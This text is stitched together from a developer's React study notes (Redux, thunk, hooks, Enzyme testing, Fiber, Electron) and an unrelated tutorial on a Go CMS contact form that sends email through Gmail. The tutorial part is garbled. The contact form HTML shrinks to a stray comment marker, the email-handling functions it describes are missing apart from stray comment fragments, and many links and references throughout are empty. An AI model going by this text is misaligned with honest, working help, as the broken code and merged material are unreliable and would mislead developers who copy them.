'SOME_TYPE_2:: return { ... } ... } WARNING WARNING WARNING: The state returned from the reducer is, unlike in react, NOT merged with the existing state. It just becomes the state. This means YOU HAVE TO DO THE MERGE YOURSELF by DEEP copying th existing state (current state is IMMUTABLE) and modifying the copy as appropriate. In components that required access to the store: - - - - - - - - - - - - - - - - - - - - - - - - - import { connect } from 'react-redux'; class MyComponent ... { ... render() { ... <!-- Here can access redux state mapped to our props as defined below --> <eg_element clicked={this.props.onSomeEvent}>{this.props.a_props_attribute}</eg_element> // ^^^^^ ^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^ // ^^^^^ ^^^^^^^^^^^ From mapStateToProps // ^^^^^ From mapDispatchToProps // ^^^^^ // NOTE HOW WHAT WAS THE STATE IS NOW ACCESSED AS PROPS! ... } } // How state, managed by redux, should be mapped to props that can be accessed in this component // The state parameter is the state as setup in reducedr.js so it will have those propertues. const mapStateToProps = state => { // Func that expects the state, stored in redux and returns a map return { a_props_attribute: state.some_state_var // ^^^^^ // The state passed into the function which is the state provided by redux! ... ... }; } // Which actions the container will DISPATCH const mapDispatchToProps = dispatch => { return { onSomeEvent: (param1) => dispatch({type: 'ACTION_TYPE', actionParam1: param1, ...}), ... }; }; // `connect` returns a new function that accepts the component to wrap: // Either export default connect(mapStateToProps)(MyComponent); // Connect is func that _returns_ a HOC // Or export default connect(mapStateToProps, mapDispatchToProps)(MyComponent); // Connect is func that _returns_ a HOC Updating state IMMUTABLY ------------------------ The state object passed into a reducer MUST NOT BE MODIFIED. So doing the following is WRONG let newState = state; newState.something += 101; // WARNING - just MUTATED the state! return newState; Instead MUST COPY THEN MODIFY COPY of state: let newState = Object.assign({}, state); // SHALLOW clones object OR let newState = {...state, something: state.something + 101 }; // Still a SHALLOW clone! CAUTION: With SHALLOW copies you cannot update any reference types in the copy. SEE SEE SEE: Updating Arrays IMMUTABLY ------------------------- I was doing it by deep copying the array with object and then doing a splice(). Another method is to use the Array.filter() method as filter returns a NEW array. Eg, to delete a particular index in an array in a react state, as we need to copy the array before modifying it, rather than doing it manually, can do it using filter: newArrayWithDeletedItem = state.member.filter( (arrayItem, itemIndexInArray) => itemIndexInArray != itemIndexToDelete ); SEE SEE SEE: Using Mulltiple Reducers ------------------------ In `index.js`: ... import { createStore, combineReducers } from 'redux'; // ^^^^^^^^^^^^^^^ // Need this extra new import; Combines the state all all sub-reducers into // ONE state... therefore sub-reducers can still access state from other // subreducers, as there is really only one root reducers with the one state // that combines the sub-states of all the sub-reducers. ... import myFirstReducer from '...'; import mySecondReducer from '...'; ... ... // Construct the root reducer const rootReducer = combineReducers({ appAreaName1 : myFirstReducer, appAreaName2 : mySecondReducer, // ^^^^^^^^^^^ // There names gives us access to the substates in our app. In our app, to access these sub states // must do const // mapStateToProps = state => { // return { // a_props_attribute: state.appAreaName1.some_state_var // ^^^^^^^^^^^^ // NOTE extra layer of nesting in state // ... // }; // } ... }); const store = createStore(rootReducer); // ^^^^^^^^^^^ // NOTE: Now the ROOT reducer is passed in as in Redux there is really // only ONE reducer. ... ReactDOM.render(<Provider store={store}><App/></Provider>); BUT WARNING WARNING WARNING The sub-reducers can NO LONGER ACCESS THE GLOBAL REDUCER STATE!!! They cannot "see" the state in the other sub-reducers. Thus, if they need state from another reducer they SHOULD RECEIVE IT AS PART OF THE ACTION PAYLOAD INSTEAD. You CAN MIX Redux With Local React State ---------------------------------------- You CAN use redux and still have local state in component and use reacts.setState(). For example, local UI state, like whether a modal should be displayed etc, is usually more appropriately stored as local state and NOT in redux. Local state, can then be passed to Redux actions if they are required by other parts of the app. Middleware ---------- SEE: Middlware provides a third-party extension point between dispatching an action, and the moment it reaches the reducer. // This whole set of nested functions (function tree) IS a middleware! // Redux will call this middleware function and pass it the store! // vvvvv const myMiddleWare = store => { // Middleware function returns a function. This function lets the action continue on its // journey to a reducer. This function will also, eventualy, be executed by redux. return next => { // Return yet another function that received the action that was dispatched as its parameter return action => { // Here can access store, next and action. This code is run inbetween the action and the // reducer. const result = next(action); //<<< Lets action continue to the reducer ... return result; }; }; }; To use the middleware must import applyMiddleware from Redux: import { createStore, combineReducers, applyMiddleware } from 'redux'; // ^^^^^^^^^^^^^^^ ... const store = createStore(rootReducer, applyMiddleware(myMiddleWare, ...)); // ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ // NEW second argument here applys an "enhancer" to the // store, which in this case is our middleware. // The function applyMiddleware accepts a list of middlewares // that will get executed in order. Redux DevTools --------------- Help debug the store! Asynchronous Code and Redux Using Redux-Thunk --------------------------------------------- RECALL: REDUCERS CAN **NOT** RUN ASYNCHRONOUS CODE! This is because the reducer returns immediately, so what ever state modification are dependent on the async code can't be comminucated back to react via this reducer - the reducer would finish before the async result was ready! USE ACTION CREATORS to overcome this problem. Action creators can be good for both sync and async code. For sync code they make the action object creation centralised into one function that accepts arguments rather than having the action object potentially created in many places. eg: // This is a SYNC action creator export const MY_ACTION = "MY_ACTION"; export const myAction = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; // And we use it in our Redux compoent's mapDispatchToProps like so. const mapDispatchToProps = dispatch => { return { // onSomeEvent is NO LONGER LIKE BELOW // onSomeEvent: (param1) => dispatch({type: 'ACTION_TYPE', actionParam1: param1, ...}), // // It is now written like onSomeEvent: (param1) => dispatch(myAction()), // ^^^^^^^^^^ // Action creator function returns, synchronously, the action // rather than creating the object in each instance the // action is created - more DRY! ... }; }; Thunk allows the action creators to, instead of returning an action object, return a function that will eventually dispatch an action. The "eventually dispatch" means that this ENABLE ASNC CODE. DO: npm install --save redux-thunk In your app you now add: import { createStore, combineReducers, applyMiddleware, compose } from 'redux'; // NEW vvvvv import thunk from 'redux-thunk'; ... const store = createStore(rootReducer, applyMiddleware(myMiddleWare, thunk)); // ^^^^^ // Thunk added to the list of middleware added to our app's store. Then create the ASYNC action creator as follows: In action creaters, no longer return action, but RETURN A FUNCTION that will EVENTUALLY DISPATCHING AN ACTION! Eg, with the myAction action creator from above: export const myAction = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; BECOMES export const myActionSync = (payload) => { return { type: MY_ACTION, payload: payload, ... }; }; export const myActionAsync = (payload) => { // Can pass getState - but it is optional... we don't have to use it. // It can be called to retrieve the current state, if we need to use it. // This is the state PRIOR to us re-dispatching the action. // vvvvvvvv return function(dispatch[, getState]) { setTimeout( () => { dispatch(myActionSync(payload)) // ^^^^^^^^^^^^ // NOTE must call sync action, not async version, otherwise create infinite loop! }, 2000); }; }; This works because in our React component we have: const mapDispatchToProps = dispatch => { return { onSomeEvent: (param1) => dispatch(myActionAsync()), // ^^^^^^^^^^^^^^ // NOTE action creator is not the async version... ... Because the action creator now returns a function, the thunk middleware detects this when the action is dispatched and DELAYS the action, by calling our function, through which we can do something asynchronously, and then call the real, non-delayed, Redux dispatch method, which will make it to the reducer, when we are ready. Data transformations -------------------- Action reducers are FREE TO MODIFY AND ADD ANY DATA TO THE ACTION PAYLOAD: export const myActionSync = (payload) => { const newPayload = someTransform(payload); return { type: MY_ACTION, payload: newPayload, ... }; }; You can also do this in the reducer itself. Better to do in action as its more flexible - different transformations for different actions that modify the same data item in the store. (my opinion) Remember: Reducers run SYNCHRONOUS CODE only, but part of core redux, Action creators CAN RUN AYSCHONOUS CODE as well as synchronous code, require thunk add on. Some utility functions: ----------------------- const updateObject = (oldObject, updatedValues) => { return { ...oldObject, ...updateValues }; };
Authentication
Typically, rather than a session, get a TOKEN, in a SPA as the server is generally a stateless REST API. Token is stored in local browser storage. User local browser storage: localStorage.getItem("string key") localStorage.setItem("string key", "sting value") Not browser local storage is not super secure. It could be accessed using XSS attacks, but otherwise should only be accessable by code served in your domain (single origin policy).
Testing
Could use Selenium but can also use NodeJS packages which will simulate the browser, which could make for faster unit tests. Jest - Populare JS testing tool often used with ReactJS Also need a way of emulating React components without having to render an entire DOM. We still need some kind of fake DOM but don't want everything. React Test Utils can do this, or use Enzyme as developed by Air Bnb - also recommended by React team. npm install --save enzyme react-test-renderer enzyme-adapter-react-16 ^^^^^^^^^^^^^^^^^^^^^^^ This one has to be specific to your react version See: << Good for mocking AJAX calls for e.g. When naming a test for a component, put it in the same directory as the component. If the component file name is MyComp.js then the TEST MUST BE NAMED MyComp.test.js, as this will then be AUTOMATICALLY picked up and included in the testing. To run the tests just use npm run test Enzyme vs React Test Utils vs react-testing-library -------------------------------------------------- FROM: ReactTestUtils gives you the bare minimum to test a React component. I haven't seen it being used for big applications. Enzyme and react-testing-library are both good libraries that give you all the tools you need to test your application. They have two different philosophies though. Enzyme allows you to access the internal workings of your components. You can read and set the state, and you can mock children to make tests run faster. On the other hand, react-testing-library doesn't give you any access to the implementation details. It renders the components and provides utility methods to interact with them. The idea is that you should communicate with your application in the same way a user would. So rather than set the state of a component you reproduce the actions a user would do to reach that state. In my experience Enzyme is easier to grasp but in the long run, it's harder to maintain. react-testing-library forces you to write tests that are a bit more complex on average but it rewards you with higher confidence in your code. FROM: Enzyme is intended for unit/integration testing. Its API was designed to test the implementation. It offers custom renderer that doesn't require DOM (for shallow rendering), behaves differently from React renderer and allows things that are important for unit testing but aren't possible or straightforward with default renderer, like synchronous state updates, shallow rendering, disabling lifecycle methods, etc. react-testing-library is intended for blackbox integration/e2e tests. It uses React renderer and ReactTestUtils internally, requires real DOM because it's component's output that is asserted in tests, not internals. It doesn't provide facilities for isolated unit tests but it's possible to do this by mocking modules that contain component that need to be spied, mocked or stubbed by other means, notably jest.mock. react-dom/test-utils and react-test-renderer contain a subset of functionality, Enzyme and react-testing-library were built upon them. API is scarce and requires to write boilerplate code or custom utility functions for full-grown testing. React officially promotes Enzyme and react-testing-library as better alternatives. Testing Components ----------------- In the MyComp.test.js file you do not need to import the test specific libraries - they will be made available automatically by the test command. MyComp.test.js -------------- import React from 'react'; import { configure, shallow } from 'enzyme'; // ^^^^^^^ // Does a shallow rendering of the component under test - it will produce // kind-of "stubs" for the immediate children and thus PREVENTS rendering // an entire subtree - efficient! import Adapter from 'enzyme-adapter-react-16'; import MyComp from './MyComp'; imoprt OtherComp from '...'; configure({adpater : new Adapter()}); // Connect Enzyme to our React version describe( 'Description of thest bundle file holds - just str for console', () => { // // DEFINE setup and teardown for this group of tests beforeAll( () => { ... } ); afterAll( () => { ... } ); // // // DEFINE setup and teardown for each test // let wrapper; beforeEach( () => { wrapper = shallow(<MyComp/>); } ); afterEach( () => { ... } ); // // DO each test // it( 'Should ... describe on individual test - just str for console', () => { // Create instance of component as it would be rendered into the DOM, (without // creating the entire DOM!) and then inspect it. Enzyme allows component to // be "rendered" stand-alone, i.e., without rest of DOM. // // If wrapper wasn't defined in the setup for each test we'd do // const wrapper = shallow(<MyComp/>); // // But it is so... expect(wrapper.find(OtherComp)).toHaveLength(2); // ^^^^^^^^^ // Note this is the JS function, NOT JSX! } ); it( 'Should do something else when another property is set', () = { // If wrapper wasn't defined in the setup for each test we'd do // const wrapper = shallow(<MyComp myAttr=Something/>); // // But it is so... wrapper.setProps({myAttr : Something}); expect(wrapper.find(...))...(); } ); } ) Testing Containers ------------------
React Hooks (React >= 16.8)
Do not confuse with life-cycle hooks like didComponentMount() which are associaed soley with class based components. React hooks allow functional components to be used *everywhere*. React-hooks do for functional components what state and the lifecycle hooks do for class based components. I.e., HOOKS REPLACE CLASS-ONLY FUNCTIONALITY. - Add state - Share logic across components - Implement functional lifecycle-like functionality. - Can build custom hooks React hooks are just JS functions that can only be used inside a functional component or other hooks (you can write your own). All hooks are called useXXX(). Eg useState() etc. See for motivation for hooks. From that page:. Important Rules =============== See: RULE. This is because React relies on the order in which Hooks are called to know which state corresponds to which useState call By "calling hook" it means the functions useState(), useEffect() etc. It does NOT refer to using the state and state-setting-function they return! These can be used as per normal! RULE 2: Only Call Hooks from React Functions You can only call Hooks from React function components and from custom Hooks. USE eslint-plugin-react-hooks to help you enforce these rules. npm install eslint-plugin-react-hooks --save-dev Read also: useState() ========== See: import React, { useState } from 'react'; ... const defaultState = ...; // Any value - unlike class state does not have to be an object ... const MyFunctionalComponent = (props) => { // The state will survive re-renders // Returns an array with *2* elements // 0: the current state snapshot // 1:function to use to update the current state const [myState, mySetState] = useState(defaultState); ... // Use myState exactly as you would have used this.state in class component // Use mySetState like you would have used this.setState() in class component BUT WARNING, it // does NOT MERGE STATE FOR YOU!!! ... return (...); }; WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv WARNING - useState's setState-like function DOES NOT MERGE STATE, IT **REPLACES** THE CURRENT STATE WITH THE ONE YOU GIVE IT! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING Just like setState(), the useState()'s update function accepts a function instead of an object when you need to update state based on previous state, except that it obv doesn't receive any props. e.g. onChange = { (event) => mySetState( (prevMyState) => ( {newVal: prevMyState.val + X} ) ) } WARNING - BE CAREFUL NOT TO CAPTURE PARAMETERS IN CLOSURE onChange = { (event) => mySetState( (prevMyState) => ( { something: event.target.value, // <<<< ERROR. See description below code. newVal: prevMyState.val + X } ) ) } Problem is this: 1. First onChange event fires and the onChange handler is called. It is passed a React synthetic event object, which is POOLED. The handler returns a function, which closes over the outer scope's environment, capturing the instance of event from the event pool. It is this inner function that is the "problem" and creates the closure over the pooled synthetic event. 2. The second onChange event fires and executes the handler, passing in a different synthetic event object, which too gets captured in the closure created. 3. At some point React will deal with these events, but it can do so when it chooses. React may re-use the event object that we have closed over in a previous handler that is yet to be called and when it is it will see the new event state, not the one it is supposed to see. There is no way to "release" event Reacts synthetic event objects, so it has no way to know if we are "holding" on to one in this way. The solution is: In the outer function, create const variables that copy the pertinant event data and use these in the inner function. This way the event can be safely re-used by react. Overcoming complexities of setting state ---------------------------------------- Remember that useState::setState function DOES NOT MERGE THE STATE OBJECT FOR YOU. Each time you must set the ENTIRE state. You can make life simpler by registering multiple state objects. Just do const [state1, state1SetFunc] = useState(''); .... const [stateN, stateNSetFunc] = useState(''); This prevents having to use one big state object - you can have many little state objects. Another way would be to write your own merge function for state update, but this would be harder to do. State Update Batching - - - - - - - - - - - - React will batch calls to setState hook functions to avoid unnecessary render cycles. All state updates from one SYNCRHONOUS event handler are BATCHED TOGETHER. Thus, after setting state, a lot like in class components, you can't immediately use the state to get the new value. useEffect() =========== SEE: import React, {useState, useEffect} from 'react'; Use effect allows one to manage side effects: The Effect Hook lets you perform side effects in function components. ... Data fetching, setting up a subscription, and manually changing the DOM in React components are all examples of side effects ... you can think of useEffect Hook as componentDidMount, componentDidUpdate, and componentWillUnmount combined. Side effects = Logs that runs and does effect the application but not in the current render cycle, i.e., a future cycle. useEffect() gets used AFTER EVERY render cycle. You need useEffect() for exactly the same reason you dont trigger side effects in a class based render function - you enter an infinite loop where each time you render you create a side effect that modifies the state and triggers a re-render and so on... Use it like this: useEffect(FUNCTION, DEPENDENCIES-OF-FUNCTION); So, your function is only run when the dependencies are modified. This is how you can get it to act like componentDidMount or componenetDidUpdate etc. The default, is, as mentioned for every render cycle, but using dependencies, you can change this... Dependencies are variables you use outside of useEffect in your function. React hook functions used in useEffect do not have to be considered external dependencies. If you ommit DEPENDENCIES-OF-FUNCTION then it runs FOR EVERY render cycle. If you make it an empty list then it only runs for the very FIRST render - i.e., like componentDidMount(). You can have multiple useEffect() calls, just like you do with useState(). To use dependencies: let [myState, setMyState] = useState(myDefaultState); ... useEffect( ()=> {...}, [myState] ); //<<< This only executes when myState is changed. This can allow us to split logic more elegantly. For example, if we fetch data based on whether a checkbox is selected, our onChange event function can just manage the checked state and we can split out the fetch logic into a useEffect() call with a dependency on the checkbox state. If you rely on props in an effect then declare them as a dependency - PROPS ARE ALSO DEPENDENCIES if you use them. This effect is called whn ANY prop changes: useEffect( () => {...}, [..., props]); This effect will be called only when a certain key in the props changes: const { keyName } = props; ... useEffect( () => {...}, [..., keyValue]); Clean Up With useEffect(): - - - - - - - - - - - - - - useEffect() can return a FUNCTION. A return value is not required, but if provided MUST be a func! The function returned is a CLEANUP function that will run before the next time useEffect() runs. Note, this is NOT after the useEffect() runs, but BEFORE the next useEffect() is run. If useEffect() has [] as its dependency, and therefore only runs once when the component is first rendered then the returned function is equivalent to componentWillUnmount()! useCallback() ============= SEE:). Save a function so that it is not re-created. This can be very useful to get out of entering infinite loops in render cycles. The course example was where a parent passes a callback function, X, to a child that uses an effect that depends on XMLHttpRequestObject and calls X, which modidifies the parent state. Because, when the parent re-renders, the callback function is redefined, the child will trigger its effect again creating this infinite loop. The way to stop this is to preserve the callback function across render cycles, so that it doesn't change due to a render and therefore the child won't call X because of the prop callback function change. Often used in combination with React.memo() and vice versa, when a function being passed to a child as a callback would otherwise change, making the memoisation unable to see the props as unchanged. useMemo() ========= Save a value so that it is not continually recreated. For example, a component has a list of values. It is re-rendered, but not because of a change to the list. Thus, do not want to re-create the components that result from the list. Save the generated components using `useMemo()`. const someComponentList = useMemo( () => { return <MyComponentList .../> }, [...dependencies...]); useRef() ======== Allows use of references as you might do in class components. const myRef = useRef(); ... <SomeElement ref={myRef}/ ...> Remember to add the ref as a DEPENDENCY if you use it in an effect! useReducer() ============ SEE: const [state, dispatch] = useReducer(reducer, initialArg, init); An alternative to useState. Accepts a reducer of type (state, action) => newState, and returns the current state paired with a dispatch method. (If you’re familiar with Redux, you already know how this works, altough NOT related to Redux otherwise). The reducer functions that you define are a lot like Redux reducers because they accept the current state and an action. Based on the action and current state, the reducer must return the new state. const myReducerForSomeThing = (currentThingState, action) => { switch(action.type) { // << The action is whatever we dispatched - its type isdnt predefined case 'SOME ACTION: return newStateBasedOnCurrentThingStateForSomeAction; ... default: throw new Error("Should never happen - all actions should be handled"); } }; ... const MyElement = () => { const [myThingState, dispatch ] = useReducer(myReducerForSomeThing, initial-state); const someHandler = () => { dispatch({type: "SOME ACTION", ...}); } } React will re-render the component WHENEVER YOUR REDUCER RETURNS NEW STATE. Reducers can make things cleaner as all of the update logic is located in one place. Makes a clearer flow of data. For HTTP requrests Sending the request is an action. Action = SEND. (But update state dont do the actual send) Handling the reply. Action = RESPONSE. Handling any errors. Action = ERROR. Reducers must be PURE FUNCTIONS: A pure function is a function which: Given the same input, will always return the same output. Produces no side effects. A dead giveaway that a function is impure is if it makes sense to call it without using its return value. For pure functions, that’s a noop. A pure function produces no side effects, which means that it can’t alter any external state. Therefore, you can't do AJAX requests from a reducer. Instead use ACTION CREATORS. useContext() ============ Is the equivalent hook to the class context setup using the member variable `static contextType = ...;` You build the provider as per normal Instead, now do: import { MyContext } from ...; const SomeComponent = props => { const myContext = useContent(MyContext); }; CUSTOM HOOKS ============ SEE: Hooks are a new addition in React 16.8. They let you use state and other React features without writing a class. * Share logic that influences component state across many different components. * Custom hooks should always be named `useXXXX`. * Inside hook functions you can use stateful features like useState() or useEffect(), for example. The stateful logic is reusable but the data it manipulates is specific to the component using the custom hook :)
Deploying To The Web
1. Remeber to add the basename attribute to <BrowserRouter/> if app is not being served from the root of the domain it is hosted on. So if serving from, no need, but if serving from, the need <BrowserRouter basename="/apps/app1/">....<.BrowserRouter>. 2. Build and optimise the site using npm run build (in your project directory) 3. Server must *always* serve the index.html file, even for 404 cases! Server gets the paths before the react app gets the path and server won't know the app paths!! 4. Upload build artifacts from step 2 to a static server (Firebase, GitHub pages, AWS S3 etc etc). I.e., the content of the build folder! Remove " Download the React DevTool..." Message ------------------------------------------------------ See: __REACT_DEVTOOLS_GLOBAL_HOOK__ = { supportsFiber: true, inject: function() {}, onCommitFiberRoot: function() {}, onCommitFiberUnmount: function() {}, };
Webpack
A bundler, a file optimizer, file transformer and transpiler (ES modern to legacy for eg). Takes multiple HTML, JS, image etc etc resources and bundles them together with optimization etc. 1. Create folder to hold project 2. Get NPM to manage dependencies. In project folder type: npm init Creates "package.json". TODO - Complete sectioN!
Third Party Components - Really good - lots of pre-styled components - Build websites on any and all devices, beautiful & load fast. < 10KB. - Parse, validate, manipulate and display dates and times in JS - - React.js components for modular charting and data visualization.
React Fiber
Prev (before React 16) reconcillation algorithm was "Stack Reconciler". It was entirely synchronous and has only one phase. Reconcillation - The algorithm React uses to diff one tree with another to determine which parts need to be changed. When state changes, react generates an intermediate virtual DOM and compares it against the previous virtual DOM before the state change. It uses this diff to update select portions of the browser DOM, as opposed to updating the whole browser DOM - efficient. The virtual DOMs are generated from Fiber's INTERNAL INSTANCE TREE, which is a tree of React component instances and DOM nodes. React Fibre is the new reconcillation algorithm included since React 16. Reconcillation saves the developer from the need to keep track of what has changed and change the browser DOM appropriately. All this "house keeping" is now done for the developer. Virtual DOM- The tree of IMMUTABLE React elements returned from the render methods Why the new reconcillation algorithm? Previously, when the rendering process started, it could not be paused - the whole process had to be done in one go, in the browser main thread. Result can be laggy user experience. Unlike previous alg, Fiber has ability to minimize and batch DOM changes to minimise how long the main thread is held for. It manipulates the main thread to enable async behaviour. Once a render method returns its sub-tree of react components, they are merged into the tree of fiber nodes - fiber analyses the components and creates corresponding fiber nodes that it inserts into its own tree. I.e., every react element has a corresponding fiber node. Unlike React elements, FIBERS ARE NOT RE-CREATED ON EVERY RENDER! The Fibre data structures, are, unlike the React components, mutable. They hold component state and DOM state. Fiber uses a LINKED LIST TREE TRAVERSAL ALGORITHM and an ASYNCHONOUS model that uses this list to peocess elements that have pending work associated with them. The Fiber process has TWO TREES: 1. Current tree After the very first render, represents state of app used to render to UI 2. Work-in-progress tree Built for the current update. Reflects the future app state that should eventually appear in the browser. It has TWO main PHASES: 1. Reconcile Mark fiber nodes with (side) effects asynchronously. Build up the WIP tree and the list of changes to be made but do NOT make those changes. This can be done asynchronously so that the main browser thread is not held for too long. It can be repeated/restarted multiple times as updates come in. It relies on a new browser API called `requestIdCallback`, which queues a function to be called during a browser's idle periods. It enables developers to perform background and low priority work on the main event loop, without impacting latency-critical events such as animation and input response. See Of course, IE doesn't support this at the time of writing, but Chrome, Edge, Firefox and Opera do. Using this API, React can do the reconcillation phase during the browser's idle period by splitting up its work into chunks and doing a chunk at a time. As it is called back, on each callback it can decide what chunk of work it wants to do, a lot like an OS scheduler would. The proprities are as follows: - synchonous << HIGH - task - animation - high - low - offscreen << LOW During this phase lifecycle hooks will be called: (UNSAFE_)componentWillMount (UNSAFE_)componentWillReceiveProps getDerivedStateFromProps shouldComponentUndpate (UNSAFE_)componentWillUpdated render Essentially, because, reca;;, JS is a single-threaded processes, using `requestIdCallback` React is able to fake a multi-threaded process using COOPERATIVE MULTITASKING (a.k.a. NON-PREEMTIVE MULTITASKING). From WikiPedia: Cooperative multitasking, also known as non-preemptive multitasking, is a style of computer multitasking in which the operating system never initiates a context switch from a running process to another process. Instead, processes voluntarily yield control periodically or when idle or logically blocked in order to enable multiple applications to be run concurrently. This type of multitasking is called "cooperative" because all programs must cooperate for the entire scheduling scheme to work. In this scheme, the process scheduler of an operating system is known as a cooperative scheduler, having its role reduced down to starting the processes and letting them return control back to it voluntarily. 2. Commit This phase still has to be done synchronously, BUT the heavy lifting has been done in the prev phase, so this minimises the amount of time that the main browser thread is held for. This does the changes in the DOM - visible to user The following lifecycle hooks will be called: getSnapshotBeforeUpdate componentDidMount componentDidUpdate componentWillUnmount Future? Improve CPU utilisation using TIME SLICING - Rendering is NON BLOCKING - yields to use input - Multiple updates at different priorities - Pre render so as not to slow visiblecontent Improve IO using React Suspense. - Access async data (e.g. from server) as easily as accessing sync data from member - Pause componentrender without blocking siblings - Precising control loading states to reduce jitter React Suspense -------------- From Website: React 16.6 added a <Suspense> component that lets you "wait" for some code to load and declaratively specify a loading state (like a spinner) while waiting...
React Native
- Framework reslies on React core - Supports iOS and Android. Microsoft also supports a version for Windows. Canonical also seem to support a version for the Ubuntu Desktop. RNative - Bundles your Javascript - Threads for UI layout and JavaScript, which is different to ReacJS web. - Threads communicate through a "bridge". E.g. JS thread will request elements to be rendered and the UI thread will render them and so on. This means, unlike in Web React that the JS thread can block but the UI thread will remain responsive. SEE snack.expo.io Its a nice little sandbox to play with react native and see how it renders in a fake phone. Unfortunately it looks like an extra learning curve on top of learning how react works. I wanted to try and change a large webapp to react-native but loads of tags need to be re-written. E.g. <div> tags become <View> tags, <span> -> <Text> and stuff like this... so there would be some rework. Also the proboperty names change too, like onClock becomes onPress. Seems like a faff. If developing from scratch might have looked at this further, as it looks pretty powerful, but no dice here so ending notes on react native.
Electron & React
Electron is a neat way of creating a NodeJS app that includes the Chromium browser to run web apps on the desktop. It allows one to create CROSS PLATFORM apps. Resources / References: ----------------------- From the Electron docs: Electron consists of three main pillars: 1. Chromium for displaying web content. 2. Node.js for working with the local filesystem and the operating system. 3. Custom APIs for working with often-needed OS native functions. Developing an application with Electron is like building a Node.js app with a web interface or building web pages with seamless Node.js integration. Example: -------- Had a little play with Elctron by embedding my little toy epic-planner app () using the the resources referenced above. 1. npm install --save-dev electron 2. add src/electron-main.js as described in the tutorials. including the freeCodeCamp's instructions on adding the ability to run from the NPM server for development and packaged build files for release: const startUrl = process.env.ELECTRON_START_URL || url.format({ pathname: path.join(__dirname, '../build/index.html'), protocol: 'file:', slashes: true }); mainWindow.loadURL(startUrl); remember to set nodeIntegration to true in the BrowserWindow's webPreferences option: mainWindow = new BrowserWindow({ ... webPreferences: { nodeIntegration: true } }); 2. add the following additions to the package.json file: ... + "main": "src/electron-main.js", + "homepage": "./", + "author": "James Hume", + "description": "A bare-bones epic planning application", ... "scripts": { .... + "electron": "electron .", + "electron-dev": "set ELECTRON_START_URL= && electron .", } 2.a The development version of the Electron app can be run by starting the NPM development server: `npm start` and by then running the Electron app: `npm run electron-dev`. 2.b The production version of the Electron app requires Electron forve... continue... 3. install Electron-Forge: (Needs Git, so on Windows run from Git Bash console) npx @electron-forge/cli import 4. `npm run build` the application in preparation 5. on windows it appears, to get the the build to work correctly the following addition must be made to the forge config in the package.json file: "config": { "forge": { "packagerConfig": { + "asar": true }, 6. On windows, from Git bash terminal, `npm run make`. 7. Find your app in the "out" folder under the directory containing package.json. Pretty frikin' awesome!! Just note, Electron Forge might change the "start" script in your package.json file to `"start": "electron-forge start",`... just be aware. If you want to access Node.js modules do the following: () use `window.require()` instead of `require()`: const fs = window.require('fs'); Access full filenames from HTML input element --------------------------------------------- From Electron adds a path property to File objects, so you can get the real path from the input element using: document.getElementById("myFile").files[0].path In react just use a ref instead of getElementById! Using Electron dialogs from React App ------------------------------------- | https://jehtech.com/reactjs.html | CC-MAIN-2021-25 | refinedweb | 13,838 | 57.37 |
Now that you have a web site using a flat file system, you would like to get some feedback from your users. Adding Disqus is easy since it’s all JavaScript code added to the page, but it isn’t what you want. You want them to be able to email you directly so that you can reply just to them.
You could create an all JavaScript system to email directly from the user’s computer, but that leaves your email open to spammers able to retrieve it from your code and sell it to other spammers. Therefore, you need to hide your email address on the server.
This tutorial is about adding an email message system to your new PressCMS (i.e. phpPress, rubyPress, nodePress, and goPress). I am starting with the front-end and then addressing the back-end for each system. I am assuming you already have these servers on your system.
How to Create the Form in the Browser
Since the front-end code will be the same for each server, you will have to copy these new files to each of the server directories. Therefore, I will talk about the files in the path as referenced from the server directory.
Instead of adding form-specific styling to the theme, this form script has everything in one place. Create the file questions.html in the
site/parts directory for the web site with the following content:
<!-->
This creates a basic form asking for a full name (first and last name), email, and a message. This form uses regular expressions to ensure that the name and email address are valid. If whatever the user inputs into those fields does not match the regular expression in the
pattern directive, then the form will not be submitted. A popup will ask the user to properly fill in the field with the message in the
title parameter. Each input field has the
required primitive as well. This keeps blank forms from being submitted. This is the bare minimum data validation you should use on the front-end.
The
action directive in the
form element tells the web browser what address to submit the form data to. The
method directive tells the browser to send as a
post method. The form data will be placed into the URL of the post request to the server. This is a Query String. The server then processes the information in the query string.
In the
site/pages directory, create the file
contact.md and place this code:
### Contact Us This is a simple contact form. Please fill in your name, first and last, email address, and message. I will get back to you as soon as possible. Thanks. {{{question}}}
Once saved, you can try out the pages in the server. In your browser, open the page.
The Contact Us page will look like the above picture. Notice the highlighting of the Name field directly upon loading. The
autofocus directive creates this desired behavior. It is always good design to have the first field the user needs to type into focused automatically.
After sending the message, a confirmation message to the user would be nice. In the
site/pages directory, create the file
messagesent.md and place this code:
### Message was sent Thank you so much for taking time to send me a message. I will reply as soon as possible.
Just a simple message so that the user knows the message was properly sent. You can expand upon this as you like.
Processing the Form With goPress
To sanitize the message given by the user, I am using the Blue Monday library. To load that library on your system, you need to run this command line:
go get github.com/microcosm-cc/bluemonday
This will make the library available for your program. That is the only non-standard library needed.
Open the
goPressServer.go file and add this to the top of the file inside the
import () statement:
"fmt" "github.com/hoisie/web" "net/smtp" "github.com/microcosm-cc/bluemonday"
Emailing messages from the server requires these libraries. After the line that has
goPress.DefaultRoutes( function call, add the following code:
// // Setup special route for our form processing. // goPress.SetPostRoute('/api/message', postMessage)
This sets a post route of
/api/message to run the function
postMessage(). At the end of the file, add this code:
// //. // } }
These two functions make up the handler for processing emails sent from the browser. The
/api/message route calls the
postMessage() function. It retrieves the information sent from the form filled in by the user, sanitizes the message with the BlueMonday library, and sends an email to the owner of the site using the
sendEmail() function. You will have to put your Gmail address in place of the
<your email address> holder and the password in the
<password> holder.
In the
goPress.go file, add this function after the
SetGetRoute() function:
// // Function: SetPostRoute // // Description: This function gives an // easy access to the // web variable setup in // this library. // // Inputs: // route Route to setup // handler Function to run that // route. // func SetPostRoute(route string, handler interface{}) { web.Post(route, handler) }
This function is exactly like the
SetGetRoute() function. The only difference is using the
web.Post() function.
